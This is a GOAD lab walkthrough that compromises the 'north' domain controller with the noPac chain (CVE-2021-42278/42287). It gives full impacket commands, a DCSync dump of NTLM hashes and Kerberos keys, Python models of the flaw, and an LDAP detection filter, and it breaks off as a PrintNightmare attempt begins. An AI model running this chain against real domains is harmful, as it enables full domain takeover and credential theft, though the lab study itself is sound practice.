Starting GOAD Life from Zero (Part 2)

Today's goal is to take the North (north.sevenkingdoms.local).

The vulnerability used is the noPac chain: CVE-2021-42278 (sAMAccountName spoofing) together with CVE-2021-42287 (the KDC's name-lookup fallback). In outline:

Add a machine: you start from an ordinary machine account (for example relayedpc$), which any domain user can create as long as ms-DS-MachineAccountQuota is above zero.

Rename: with renameMachine.py (or bloodyAD) rename relayedpc$ to winterfell, the DC's name without the trailing $. Before the fix, the DC accepted a computer sAMAccountName without the $.

Request a ticket: request a TGT as the spoofed name; the TGT's cname is now "winterfell".

Restore the name: once the TGT is in hand, rename the account back (to relayedpc$). This is the step that makes the KDC confuse the two accounts: when the service ticket is requested, no account called "winterfell" exists any more, so an unpatched KDC retries the lookup with a $ appended and lands on WINTERFELL$, the DC's own account.

S4U2self: with the TGT obtained under the spoofed name, ask for a service ticket that impersonates a domain admin to that account, which the KDC now believes is the DC.
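To make steps 4 and 5 concrete, here is a small Python model of the directory and KDC logic the chain abuses. It is an added example, not code from GOAD or from any of the tools above; the account names follow the walkthrough, while the SIDs, the quota value and the directory itself are constructed. It replays the five steps against an unpatched KDC, which hands out a ticket for WINTERFELL$, and against a patched one, which refuses at step 2 for a normal user and, if the rename were somehow allowed, at step 5 because the PAC's requestor SID no longer matches the cname.

```python
"""Toy model of the two bugs that noPac chains (added example, not code from the GOAD walkthrough).

CVE-2021-42278: a DC accepted a computer sAMAccountName without the trailing '$' from a
low-privileged principal. CVE-2021-42287: a KDC that could not find the account named in a
TGT's cname retried the lookup with '$' appended, so a TGT issued to 'winterfell' was treated
as belonging to WINTERFELL$ once 'winterfell' no longer existed. Account names mirror the
walkthrough; the directory, SIDs and quota are constructed.
"""

MACHINE_ACCOUNT_QUOTA = 10   # ms-DS-MachineAccountQuota, the value nxc -M maq printed
# LDAP filter a defender can run to spot step 2 (computer objects whose name lost its '$'):
HUNT_FILTER = "(&(objectClass=computer)(!(sAMAccountName=*$)))"


class Directory:
    """A single domain's account store plus the two checks the patches added."""

    def __init__(self, patched):
        self.patched = patched
        self.accounts = {}            # upper-cased sAMAccountName -> account dict
        self.quota_used = 0
        self._add("WINTERFELL$", "S-1-5-21-1-1-1-1001", is_dc=True)

    def _add(self, sam, sid, is_dc=False):
        self.accounts[sam.upper()] = {"sam": sam, "sid": sid, "is_dc": is_dc}

    def add_computer(self, sam, creator="jon.snow"):
        """impacket-addcomputer: any authenticated user may add up to MachineAccountQuota machines."""
        if self.quota_used >= MACHINE_ACCOUNT_QUOTA:
            raise PermissionError("MachineAccountQuota exhausted for " + creator)
        self.quota_used += 1
        self._add(sam, "S-1-5-21-1-1-1-%d" % (1100 + self.quota_used))

    def rename(self, old, new, privileged=False):
        """renameMachine.py: change sAMAccountName. A patched DC refuses a '$'-less name from a
        non-privileged caller (the CVE-2021-42278 fix); uniqueness is enforced either way."""
        if new.upper() in self.accounts:
            raise ValueError("sAMAccountName %s already exists" % new)
        if self.patched and not privileged and not new.endswith("$"):
            raise PermissionError("computer sAMAccountName must end with '$' (CVE-2021-42278 fix)")
        acct = self.accounts.pop(old.upper())
        acct["sam"] = new
        self.accounts[new.upper()] = acct

    def lookup(self, sam):
        return self.accounts.get(sam.upper())

    def lookup_by_sid(self, sid):
        return next((a for a in self.accounts.values() if a["sid"] == sid), None)


class KDC:
    def __init__(self, directory):
        self.d = directory

    def as_req(self, sam):
        """getTGT: the TGT names the client (cname) and its PAC records the requestor's SID."""
        acct = self.d.lookup(sam)
        if acct is None:
            raise KeyError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        return {"cname": acct["sam"], "requestor_sid": acct["sid"]}

    def resolve_cname(self, tgt):
        """Which account does the KDC think presented this TGT?
        Unpatched: look the name up and, if it is missing, retry with '$' appended (CVE-2021-42287).
        Patched: resolve the PAC's requestor SID and refuse a TGT whose cname no longer matches it."""
        if self.d.patched:
            acct = self.d.lookup_by_sid(tgt["requestor_sid"])
            if acct is None or acct["sam"].upper() != tgt["cname"].upper():
                raise PermissionError("PAC requestor SID does not match cname; TGT rejected")
            return acct
        acct = self.d.lookup(tgt["cname"]) or self.d.lookup(tgt["cname"] + "$")
        if acct is None:
            raise KeyError("KDC_ERR_C_PRINCIPAL_UNKNOWN")
        return acct

    def s4u2self(self, tgt, impersonate):
        """getST -self: a service ticket for `impersonate` to whatever service the TGT resolves to."""
        svc = self.resolve_cname(tgt)
        return {"client": impersonate, "service": svc["sam"], "service_is_dc": svc["is_dc"]}


def run_nopac(patched, privileged_rename=False):
    """Replay the five steps; return the S4U2self ticket, or the message that stopped the chain."""
    d = Directory(patched)
    kdc = KDC(d)
    try:
        d.add_computer("samaccountname$")                              # 1. add a machine account
        d.rename("samaccountname$", "winterfell", privileged_rename)   # 2. drop the '$', take the DC's name
        tgt = kdc.as_req("winterfell")                                 # 3. TGT with cname = winterfell
        d.rename("winterfell", "samaccount$", privileged_rename)       # 4. 'winterfell' no longer exists
        return kdc.s4u2self(tgt, "administrator")                      # 5. S4U2self as administrator
    except (PermissionError, KeyError, ValueError) as err:
        return str(err)


if __name__ == "__main__":
    print(run_nopac(patched=False))
    print(run_nopac(patched=True))
```

Run it directly to see both outcomes. HUNT_FILTER is the LDAP query a defender can run to catch the window between step 2 and step 4: a computer object whose sAMAccountName lacks the trailing $ is the signature of this attack.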

First, prepare to add the machine account.

Check the machine account quota

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc ldap winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M maq
LDAP 192.168.10.11 389 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:None) (channel binding:Never)
LDAP 192.168.10.11 389 WINTERFELL [+] north.sevenkingdoms.local\jon.snow:iknownothing
MAQ 192.168.10.11 389 WINTERFELL [*] Getting the MachineAccountQuota
MAQ 192.168.10.11 389 WINTERFELL MachineAccountQuota: 10

The plan: add a computer, clear that computer's SPNs, rename it to the same name as the DC, obtain a TGT for it, reset its name so the DC's name is free again, use the TGT obtained earlier to get a service ticket, and finally DCSync.

Add the computer

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-addcomputer -computer-name 'samaccountname$' -computer-pass 'ComputerPassword' -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account samaccountname$ with password ComputerPassword.

Clear the SPNs. addcomputer registers HOST/... and RestrictedKrbHost/... SPNs built from the original name, and the rename in the next step fails if they are still present, so remove them first with addspn.py from krbrelayx.

https://github.com/dirkjanm/krbrelayx

┌──(root㉿kaada)-[/opt/krbrelayx-master]
└─# python addspn.py --clear -t 'samaccountname$' -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' 'winterfell.north.sevenkingdoms.local'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] Printing object before clearing
DN: CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local - STATUS: Read - READ TIME: 2026-02-02T01:57:32.542507
sAMAccountName: samaccountname$

[+] SPN Modified successfully

Rename the computer to the DC's name (winterfell, without the $)

gist.githubusercontent.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383/raw/d4191e295c96bc1cfb0a54b18cfbb8b21d25b483/renameMachine.py

┌──(root㉿kaada)-[/opt/krbrelayx-master]
└─# python renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target machine renamed successfully!

Get a TGT for the spoofed name. The ticket is saved as winterfell.ccache and its cname is winterfell, not winterfell$; that cname is what the KDC will later fail to find.

┌──(root㉿kaada)-[/opt/krbrelayx-master]
└─# impacket-getTGT -dc-ip 'winterfell.north.sevenkingdoms.local' 'north.sevenkingdoms.local'/'winterfell':'ComputerPassword'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in winterfell.ccache

Restore the computer name. The name used here, samaccount$, is not the original samaccountname$. That does not matter for the attack (all that matters is that no account called winterfell exists any more), but it is the name that shows up in the NTDS dump later and the one that has to be deleted during cleanup.

┌──(root㉿kaada)-[/opt/krbrelayx-master]
└─# python renameMachine.py -current-name 'winterfell' -new-name 'samaccount$' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target machine renamed successfully!

Use getST.py to request a service ticket (ST) from the DC via S4U2self

S4U2self: through S4U2self, service A can obtain from the KDC a service ticket for account B to service A, exactly as if account B had itself asked the KDC for a ticket to service A. In other words, the protocol yields a ticket to A on behalf of any domain account, and B never has to authenticate to the domain. Here "service A" is the account the TGT belongs to, which the KDC, because of the rename, now resolves to WINTERFELL$; -altservice then rewrites the sname to CIFS/winterfell.north.sevenkingdoms.local so the ticket is usable against SMB and DRSUAPI.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-getST -self -impersonate 'administrator' -altservice 'CIFS/winterfell.north.sevenkingdoms.local' -k -no-pass -dc-ip 'winterfell.north.sevenkingdoms.local' 'north.sevenkingdoms.local'/'winterfell' -debug
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: winterfell.ccache
[+] Returning cached credential for KRBTGT/NORTH.SEVENKINGDOMS.LOCAL@NORTH.SEVENKINGDOMS.LOCAL
[+] Using TGT from cache
[+] Username retrieved from CCache: winterfell
[*] Impersonating administrator
[+] AUTHENTICATOR
Authenticator:
authenticator-vno=5
crealm=NORTH.SEVENKINGDOMS.LOCAL
cname=PrincipalName:
name-type=1
name-string=SequenceOf:
winterfell

cusec=970874
ctime=20260202071620Z



[+] S4UByteArray
0000 01 00 00 00 61 64 6D 69 6E 69 73 74 72 61 74 6F ....administrato
0010 72 6E 6F 72 74 68 2E 73 65 76 65 6E 6B 69 6E 67 rnorth.sevenking
0020 64 6F 6D 73 2E 6C 6F 63 61 6C 4B 65 72 62 65 72 doms.localKerber
0030 6F 73 os
[+] CheckSum
0000 C0 71 1D B8 6B C8 F2 05 F1 B8 C4 4A D2 39 87 00 .q..k......J.9..
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
userName=PrincipalName:
name-type=1
name-string=SequenceOf:
administrator

userRealm=north.sevenkingdoms.local
cksum=Checksum:
cksumtype=-138
checksum=0xc0711db86bc8f205f1b8c44ad2398700

auth-package=Kerberos

[+] Final TGS
TGS_REQ:
pvno=5
msg-type=12
padata=SequenceOf:
PA_DATA:
padata-type=1
padata-value=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
PA_DATA:
padata-type=129
padata-value=0x3063a01a3018a003020101a111300f1b0d61646d696e6973747261746f72a11b1b196e6f7274682e736576656e6b696e67646f6d732e6c6f63616ca21c301aa0040202ff76a1120410c0711db86bc8f205f1b8c44ad2398700a30a1b084b65726265726f73

req-body=KDC_REQ_BODY:
kdc-options=1082195968
realm=NORTH.SEVENKINGDOMS.LOCAL
sname=PrincipalName:
name-type=0
name-string=SequenceOf:
winterfell

till=20260203071620Z
nonce=1127067172
etype=SequenceOf:
18 23


[*] Requesting S4U2self
[+] Trying to connect to KDC at winterfell.north.sevenkingdoms.local:88
[+] Original sname is not formatted as usual (i.e. CLASS/HOSTNAME), automatically filling the substitution service will fail
[+] Original sname is: winterfell
[+] No service realm in new SPN, using the current one (NORTH.SEVENKINGDOMS.LOCAL)
[*] Changing service from winterfell@NORTH.SEVENKINGDOMS.LOCAL to CIFS/winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL
[*] Saving ticket in administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache
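The debug output above prints the raw S4UByteArray, its checksum and the DER-encoded padata of type 129. The following Python, an added example rather than code from the walkthrough or from impacket, decodes that padata (hex copied from the output above) with a minimal DER walker, rebuilds the S4UByteArray from the decoded fields, and implements the HMAC-MD5 checksum (cksumtype -138, key usage 17) that getST computes with the TGT session key. The session key itself is not on the page, so the verification at the end uses a constructed stand-in key and fails; the point it makes is that the only secret binding "administrator" to this request is the session key of a TGT the attacker already holds.

```python
"""Added example (not from the GOAD walkthrough): decode the PA-FOR-USER padata (type 129) that
getST printed and rebuild the S4UByteArray its checksum covers.

PA-FOR-USER (MS-SFU 2.2.1) is how S4U2self names the user to impersonate. Its checksum is
HMAC-MD5 (cksumtype -138) keyed with the TGT session key over
  LE32(name-type) || name-string components || realm || auth-package
with key usage 17. Whoever holds the TGT session key can therefore name any user; the KDC
never sees that user's credentials. The padata hex is copied from the page; the session key
used at the end is a constructed stand-in, not the real one.
"""
import hashlib
import hmac
import struct

PADATA_VALUE_HEX = (
    "3063a01a3018a003020101a111300f1b0d61646d696e6973747261746f72a11b1b196e6f7274682e"
    "736576656e6b696e67646f6d732e6c6f63616ca21c301aa0040202ff76a1120410c0711db86bc8f2"
    "05f1b8c44ad2398700a30a1b084b65726265726f73"
)
KEY_USAGE_PA_FOR_USER = 17


def der_tlvs(buf):
    """Yield (tag, value) for consecutive DER TLVs with definite lengths."""
    i = 0
    while i < len(buf):
        tag, length = buf[i], buf[i + 1]
        i += 2
        if length & 0x80:                      # long form: next n bytes hold the length
            n = length & 0x7F
            length = int.from_bytes(buf[i:i + n], "big")
            i += n
        yield tag, buf[i:i + length]
        i += length


def _single(buf):
    """Unwrap the one TLV inside an EXPLICIT [n] tag."""
    (_, value), = der_tlvs(buf)
    return value


def parse_pa_for_user(der):
    """PA-FOR-USER ::= SEQUENCE { userName [0] PrincipalName, userRealm [1] Realm,
                                 cksum [2] Checksum, auth-package [3] KerberosString }"""
    out = {}
    for tag, val in der_tlvs(_single(der)):   # walk the outer SEQUENCE
        ctx = tag & 0x1F
        if ctx == 0:   # PrincipalName ::= SEQUENCE { name-type [0] Int32, name-string [1] SEQUENCE OF }
            for t, v in der_tlvs(_single(val)):
                if t & 0x1F == 0:
                    out["name_type"] = int.from_bytes(_single(v), "big", signed=True)
                else:
                    out["name_string"] = [s.decode() for _, s in der_tlvs(_single(v))]
        elif ctx == 1:
            out["realm"] = _single(val).decode()
        elif ctx == 2:  # Checksum ::= SEQUENCE { cksumtype [0] Int32, checksum [1] OCTET STRING }
            for t, v in der_tlvs(_single(val)):
                if t & 0x1F == 0:
                    out["cksumtype"] = int.from_bytes(_single(v), "big", signed=True)
                else:
                    out["checksum"] = _single(v)
        elif ctx == 3:
            out["auth_package"] = _single(val).decode()
    return out


def s4u_byte_array(name_type, name_string, realm, auth_package):
    """The bytes the PA-FOR-USER checksum is computed over (getST prints them as 'S4UByteArray')."""
    return (struct.pack("<I", name_type) + "".join(name_string).encode()
            + realm.encode() + auth_package.encode())


def hmac_md5_checksum(key, key_usage, data):
    """RFC 4757 HMAC-MD5 checksum: Ksign = HMAC-MD5(K, "signaturekey" + NUL);
    result = HMAC-MD5(Ksign, MD5(LE32(usage) || data))."""
    ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
    inner = hashlib.md5(struct.pack("<I", key_usage) + data).digest()
    return hmac.new(ksign, inner, hashlib.md5).digest()


def verify_pa_for_user(der, session_key):
    """True if the checksum inside the padata was made with this TGT session key."""
    f = parse_pa_for_user(der)
    arr = s4u_byte_array(f["name_type"], f["name_string"], f["realm"], f["auth_package"])
    return hmac.compare_digest(hmac_md5_checksum(session_key, KEY_USAGE_PA_FOR_USER, arr), f["checksum"])


def decode_page_padata():
    """Parse the padata copied from the page and rebuild its S4UByteArray."""
    f = parse_pa_for_user(bytes.fromhex(PADATA_VALUE_HEX))
    return f, s4u_byte_array(f["name_type"], f["name_string"], f["realm"], f["auth_package"])


if __name__ == "__main__":
    fields, arr = decode_page_padata()
    print(fields["name_string"], fields["realm"], fields["cksumtype"], fields["checksum"].hex())
    print(arr)
    stand_in_key = bytes(range(16))   # constructed; the real session key lives in winterfell.ccache
    print(verify_pa_for_user(bytes.fromhex(PADATA_VALUE_HEX), stand_in_key))
```

The decoded name_string is ['administrator'], the realm is north.sevenkingdoms.local, and the rebuilt array is the same 50 bytes printed as S4UByteArray above; verify_pa_for_user is the check the KDC performs with the real session key.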

Then DCSync with the saved ticket.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# export KRB5CCNAME=administrator@CIFS_winterfell.north.sevenkingdoms.local@NORTH.SEVENKINGDOMS.LOCAL.ccache

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -k -no-pass -dc-ip 'winterfell.north.sevenkingdoms.local' @'winterfell.north.sevenkingdoms.local'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x5c187ac5247c939e6bc15282bce1e92d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
NORTH\WINTERFELL$:plain_password_hex:fd0dd579adf168c6cd4a3813bda4973d25bb8bd798e41c6a2f14de4eb21f1e2e979258e2402d6130460a16eb00827133d0ca596fb2aa503a839dc9e9a7c1a71acc35ee397c99d532d9c992dce4f0391102b1ce574b593d21aa6b51501aed76d3c93b862a51a9a8279e24fd74442cb5690a880d7c419646f0c0950b30bc8cbcd3dcf5785b393a7f9c0b5bcee7c97af2b9971cfd7c2f1c60b8f4da9ff1fdcc5f640a30cc5621a4420b9ee9281edc0eabdd3c04f9072f0adb6d9c6da79a1f0b70ad58d7ef2bd66e48a0e9de750faeebb4c188a522fb8459f218a8af10206addd5e9b4970ebccd286142e84e98375d3d2268
NORTH\WINTERFELL$:aad3b435b51404eeaad3b435b51404ee:f9a4c95e41bd1238887ce5e7ca12039a:::
[*] DefaultPassword
NORTH\robb.stark:sexywolfy
[*] DPAPI_SYSTEM
dpapi_machinekey:0x97a8af655dda4d3028aa6ca91e43d1033195e014
dpapi_userkey:0xbd0c69088f040653a8eef62ec8be6560ea41f2b8
[*] NL$KM
0000 A0 B9 07 4A 55 70 F9 F9 FA CC 68 30 15 F5 95 A2 ...JUp....h0....
0010 58 69 29 AD 87 BA A5 9F 76 EB AC F3 07 63 71 5A Xi).....v....cqZ
0020 ED 26 C1 FC 5A 2B D3 25 A0 74 E6 E4 90 53 D5 19 .&..Z+.%.t...S..
0030 E8 D6 BD D0 F3 36 76 5A A6 74 1B 5B D8 30 90 2A .....6vZ.t.[.0.*
NL$KM:a0b9074a5570f9f9facc683015f595a2586929ad87baa59f76ebacf30763715aed26c1fc5a2bd325a074e6e49053d519e8d6bdd0f336765aa6741b5bd830902a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:921fb182cfcf32e3a83332da4ad500b6:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:f9a4c95e41bd1238887ce5e7ca12039a:::
CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:0dfd2a24c6bff862ced231c6aab1728a:::
samaccount$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83:::
SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:c54199154ad73c3fd01ec9f233dbb1c9:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
Administrator:aes128-cts-hmac-sha1-96:bb7b6aed58a7a395e0e674ac76c28aa0
Administrator:des-cbc-md5:fe58cdcd13a43243
krbtgt:aes256-cts-hmac-sha1-96:db2ad65b1eb1bb5a4fb4b3d55412b102e7deb11cade1166ec9097b9593b56d70
krbtgt:aes128-cts-hmac-sha1-96:c6e4a39a498e405fb41b96564b53caf2
krbtgt:des-cbc-md5:753dd6768f103779
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
arya.stark:aes256-cts-hmac-sha1-96:2001e8fb3da02f3be6945b4cce16e6abdd304974615d6feca7d135d4009d4f7d
arya.stark:aes128-cts-hmac-sha1-96:8477cba28e7d7cfe5338d172a23d74df
arya.stark:des-cbc-md5:13525243d6643285
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
eddard.stark:aes128-cts-hmac-sha1-96:5f9b06a24b90862367ec221a11f92203
eddard.stark:des-cbc-md5:8067f7abecc7d346
catelyn.stark:aes256-cts-hmac-sha1-96:c8302e270b04252251de40b2bd5fba37395b55d5ed9ac95e03213dc739827283
catelyn.stark:aes128-cts-hmac-sha1-96:50ce7e2ad069fa40fb2bc7f5f9643d93
catelyn.stark:des-cbc-md5:6b314670a2f84cfb
robb.stark:aes256-cts-hmac-sha1-96:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a
robb.stark:aes128-cts-hmac-sha1-96:b2965905e68356d63fedd9904357cc42
robb.stark:des-cbc-md5:c4b62c797f5dd01f
sansa.stark:aes256-cts-hmac-sha1-96:a268e7a385f4f165c6489c18a3bdeb52c5e505050449c6f9aeba4bc06a7fcbed
sansa.stark:aes128-cts-hmac-sha1-96:e2e6e885f6f4d3e25d759ea624961392
sansa.stark:des-cbc-md5:4c7c16e3f74cc4d3
brandon.stark:aes256-cts-hmac-sha1-96:6dd181186b68898376d3236662f8aeb8fa68e4b5880744034d293d18b6753b10
brandon.stark:aes128-cts-hmac-sha1-96:9de3581a163bd056073b71ab23142d73
brandon.stark:des-cbc-md5:76e61fda8a4f5245
rickon.stark:aes256-cts-hmac-sha1-96:79ffda34e5b23584b3bd67c887629815bb9ab8a1952ae9fda15511996587dcda
rickon.stark:aes128-cts-hmac-sha1-96:d4a0669b1eff6caa42f2632ebca8cd8d
rickon.stark:des-cbc-md5:b9ec3b8f2fd9d98a
hodor:aes256-cts-hmac-sha1-96:a33579ec769f3d6477a98e72102a7f8964f09a745c1191a705d8e1c3ab6e4287
hodor:aes128-cts-hmac-sha1-96:929126dcca8c698230b5787e8f5a5b60
hodor:des-cbc-md5:d5764373f2545dfd
jon.snow:aes256-cts-hmac-sha1-96:5a1bc13364e758131f87a1f37d2f1b1fa8aa7a4be10e3fe5a69e80a5c4c408fb
jon.snow:aes128-cts-hmac-sha1-96:d8bc99ccfebe2d6e97d15f147aa50e8b
jon.snow:des-cbc-md5:084358ceb3290d7c
samwell.tarly:aes256-cts-hmac-sha1-96:b66738c4d2391b0602871d0a5cd1f9add8ff6b91dcbb7bc325dc76986496c605
samwell.tarly:aes128-cts-hmac-sha1-96:3943b4ac630b0294d5a4e8b940101fae
samwell.tarly:des-cbc-md5:5efed0e0a45dd951
jeor.mormont:aes256-cts-hmac-sha1-96:be10f893afa35457fcf61ecc40dc032399b7aee77c87bb71dd2fe91411d2bd50
jeor.mormont:aes128-cts-hmac-sha1-96:1b0a98958e19d6092c8e8dc1d25c788b
jeor.mormont:des-cbc-md5:1a68641a3e9bb6ea
sql_svc:aes256-cts-hmac-sha1-96:24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af
sql_svc:aes128-cts-hmac-sha1-96:01290f5b76c04e39fb2cb58330a22029
sql_svc:des-cbc-md5:8645d5cd402f16c7
WINTERFELL$:aes256-cts-hmac-sha1-96:536f18d284a034da7b3b2773ecd38b290da94cb60b140f3991e2a61d723084c6
WINTERFELL$:aes128-cts-hmac-sha1-96:925b7f6e5fa6fa831d02fefe3f27e927
WINTERFELL$:des-cbc-md5:67f84098a2c7fe3e
CASTELBLACK$:aes256-cts-hmac-sha1-96:0db8d97ee33a620d961fe254ab70b6635d184be4c9795ac0244d6e8afb3a1ae6
CASTELBLACK$:aes128-cts-hmac-sha1-96:662441eb1d89f45693edda51b1e20aea
CASTELBLACK$:des-cbc-md5:5d5ece267919f44c
samaccount$:aes256-cts-hmac-sha1-96:7b9a52e2d94aa24dcea3d181001b03380291929a0094fa5b24f44d2a221faa89
samaccount$:aes128-cts-hmac-sha1-96:98c00ce456e342106141609163511daa
samaccount$:des-cbc-md5:f8ab2001bcecc252
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:685f215e60383f5b4ceab557a475291ced63a62d8b938e743253c1c4d4c72a36
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:63cb1cb0fe6926ba1a71cff25ad6588b
SEVENKINGDOMS$:des-cbc-md5:df23da31739ee90e
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f9b9dab0900>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f9b9dab0900>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'

Some errors were thrown, but nothing serious: they come from the cleanup phase (stopping RemoteRegistry after the dump), and by then the NTDS hashes had already been exported. The North has fallen and Winterfell has burned; now to clean up our traces.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-addcomputer -computer-name 'samaccount$' -delete -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH -hashes 'aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4' 'north.sevenkingdoms.local/Administrator'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully deleted samaccount$.

The machine account we added has been deleted successfully, using the Administrator hash from the dump and the account's current name, samaccount$.

The next target is Meereen (the essos.local DC), via PrintNightmare.

Reference: Windows privilege escalation: PrintNightmare, by 扛枪的书生 on 博客园 (cnblogs)

Check whether the target exposes the print spooler RPC interfaces.

┌──(root㉿kaada)-[/home/kali/Desktop]
